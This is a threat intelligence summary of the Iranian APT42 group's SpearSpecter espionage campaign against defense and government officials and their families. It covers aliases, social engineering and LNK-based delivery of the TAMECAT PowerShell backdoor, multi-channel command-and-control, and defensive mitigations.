Full Report
The Iranian state-sponsored threat actor known as APT42 has been observed targeting individuals and organizations that are of interest to the Islamic Revolutionary Guard Corps (IRGC) as part of a new espionage-focused campaign. The activity, detected in early September 2025 and assessed to be ongoing, has been codenamed SpearSpecter by the Israel National Digital Agency (INDA). "The
Analysis Summary
# Threat Actor: APT42
## Attribution & Identity
**Attribution:** Iranian state-sponsored threat actor.
**Known Aliases & Associated Groups:** APT42 overlaps with the IRGC threat cluster tracked as APT35, CALANQUE, Charming Kitten, CharmingCypress, Cobalt Illusion, Educated Manticore, GreenCharlie, ITG18, Magic Hound, Mint Sandstorm (formerly Phosphorus), TA453, and Yellow Garuda.
**Internal Sub-groups:** SpearSpecter activity is attributed to Cluster D of APT42 (focusing on malware-based operations), distinct from Cluster B (which focuses on credential harvesting).
## Activity Summary
APT42 is conducting a new, ongoing espionage-focused campaign codenamed **SpearSpecter**, detected in early September 2025 by the Israel National Digital Agency (INDA). The campaign systematically targets high-value senior defense and government officials. A notable feature is the extension of targeting to the primary targets' family members to exert broader pressure. INDA noted that two different sub-groups within APT42 conducted the SpearSpecter campaign and a separate credential-harvesting campaign detailed in June 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Mounting convincing social engineering campaigns that can run for days or weeks to build trust, sometimes masquerading as known contacts.
- **Impersonation:** Posing as high-value contacts (or, in related campaigns, technology executives/researchers).
- **Pretexting:** Inviting targets to prestigious conferences or arranging significant meetings to initiate contact.
- **Credential Harvesting:** Redirecting victims to bogus meeting pages designed to capture credentials.
- **Malicious Document Delivery (LNK Abuse):** Impersonating trusted WhatsApp contacts to send malicious links disguised as required meeting documents. This leads to a redirect chain serving a WebDAV-hosted Windows shortcut (`.LNK` file) masquerading as a PDF, exploiting the "search-ms:" protocol handler.
- **Malware Deployment:** Deploying the PowerShell backdoor known as **TAMECAT** for persistent access.
- **Loader Usage:** The LNK file retrieves a batch script that functions as a loader for TAMECAT.
- **Modular Backdoor:** TAMECAT uses various modular components for data exfiltration and remote control.
- **Multi-Channel C2:** Utilizing three distinct channels for Command-and-Control: HTTPS, Discord, and Telegram (via an attacker-controlled Telegram bot).
## Targeting
- **Sectors:** Defense and Government.
- **Geography:** Not explicitly stated, but operations are being tracked by INDA (Israel).
- **Victims:** High-value senior defense and government officials, and by extension, their family members.
## Tools & Infrastructure
- **Malware Families Used:** TAMECAT (PowerShell backdoor).
- **Infrastructure (C2, domains, IPs):**
- WebDAV hosting for LNK files.
- Cloudflare Workers subdomain used to retrieve the batch script loader.
- C2 Channels: HTTPS, Discord, and Telegram bots.
## Implications
APT42/Cluster D is demonstrating a persistent, high-effort espionage campaign focused on senior defense and government figures, likely supporting the intelligence requirements of the IRGC. The group's ability to leverage family members increases coercion potential. The use of multi-channel C2 (Discord/Telegram) suggests a strong effort to maintain long-term persistence even if traditional C2 channels are disrupted.
## Mitigations
- Heightened vigilance regarding unsolicited invitations or meeting requests, especially those related to high-profile conferences or requiring document review.
- Organizations should implement strict controls around protocol handlers like "search-ms:" to prevent unintended execution paths.
- Review and segment access controls for high-value personnel, acknowledging that family members may serve as an extended attack surface.
- Monitor network traffic for C2 communication patterns associated with known PowerShell backdoors utilizing Discord or Telegram channels.